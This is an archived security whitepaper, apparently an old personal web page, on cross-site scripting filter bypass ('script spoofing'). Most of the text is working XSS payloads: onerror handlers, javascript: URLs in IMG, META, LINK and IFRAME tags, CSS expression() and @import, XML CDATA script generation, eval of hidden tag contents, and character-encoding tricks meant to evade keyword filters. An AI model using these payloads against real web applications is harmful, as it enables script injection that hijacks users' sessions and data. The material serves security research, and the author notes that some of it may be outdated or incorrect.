Www.edup.tudelft.nl/~bjwever/whitepaper xss2.html.php

From Skypher

Warning
This information is copied from my old webpage @ http://www.edup.tudelft.nl/~bjwever. Some or all of it may be outdated and incorrect. The only thing close to any guarantee that I can give about the contents of this page is that it is very likely to be chock-full of spelling errors.

Encoding scripts to bypass filters (script spoofing)

The Credits

I got the idea of encoding scripts (and especially of using CSS tags) from Andrew Clover, who posted it on the bugtraq list at the SecurityFocus website.

The '@import' came from Georgi Guninski, who used it to fool Hotmail into executing JScript.

The XML generation of HTML came from GreyMagic Software, who used it to auto-execute any local file using the OBJECT tag flaw in IE.

How to execute scripts

Here are some examples of how to execute script in not so commonly known ways. These come in handy when keywords like SCRIPT are filtered out:

Using JavaScript "on*" events.

<IMG width="0" height="0" onerror="alert();" src="::">

(Use "onError" on a picture that doesn't exist, otherwise use "onLoad".)

Using "javascript:" urls.

<META http-equiv="refresh" content="0;url=javascript:alert();">
<IMG width="0" height="0" src="javascript:alert();">
<LINK rel="stylesheet" href="javascript:alert();">
<IFRAME width="0" height="0" src="javascript:alert();" ></IFRAME>

Using Cascading StyleSheets rules.

<STYLE type="text/css">
  @import url(javascript:alert());
  body { background: url(javascript:alert()); }
  body { width: expression(alert()); }
</STYLE>
<IMG width="0" height="0" style="width: expression(alert());">
<IMG width="0" height="0" style="background: url(javascript:alert());">

Using XML to generate HTML with <![CDATA[ ]]>.

<SPAN datasrc="#xml" datafld="XML2" dataformatas="html"></SPAN>
<XML id="xml"><XML1><XML2>
  <![CDATA[<]]>SCRIPT<![CDATA[>]]>
    alert();
  <![CDATA[<]]>/SCRIPT<![CDATA[>]]>
</XML2></XML1></XML>

(This will result in the SPAN's innerHTML becoming '<SCRIPT>alert();</SCRIPT>'.)

The examples above that use a URL to execute scripts all use 'javascript:alert();', but this can be replaced with 'about:<script>alert();</script>' in most cases.

Hiding big chunks of code

If you are able to execute one script command, you can execute as many as you want: simply put your script code inside any tag like DIV, SPAN, P, etc. and use 'eval(tag_containing_jscript.innerHTML)' to execute it.

The STYLE tag is ideal, since its innerHTML does not get displayed. Tags like DIV, SPAN, P, etc. need something like style="visibility:hidden" if they are to go undetected by eye.

<STYLE id="jscript">
  alert();
  //...more JScript...
</STYLE>
<IMG width="0" height="0" src="javascript:eval(jscript.innerHTML)">

To execute the code held in a tag, use one of the following:

eval(code);
setTimeout(code, 1);
setInterval(code, 1);
window.execScript(code, "javascript");

Character filter circumvention

Sometimes it is not possible to insert certain characters or words; encoding the characters (as HTML numeric character references or as URL escapes) helps here:

<IMG src="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;%61%6C%65%72%74%28%29%3B">

The src attribute above decodes to 'javascript:alert();': the browser first resolves the numeric character references to 'javascript:' and then the URL escapes to 'alert();'.

My shellcode encoder Beta can also be used to encode scripts in this manner.
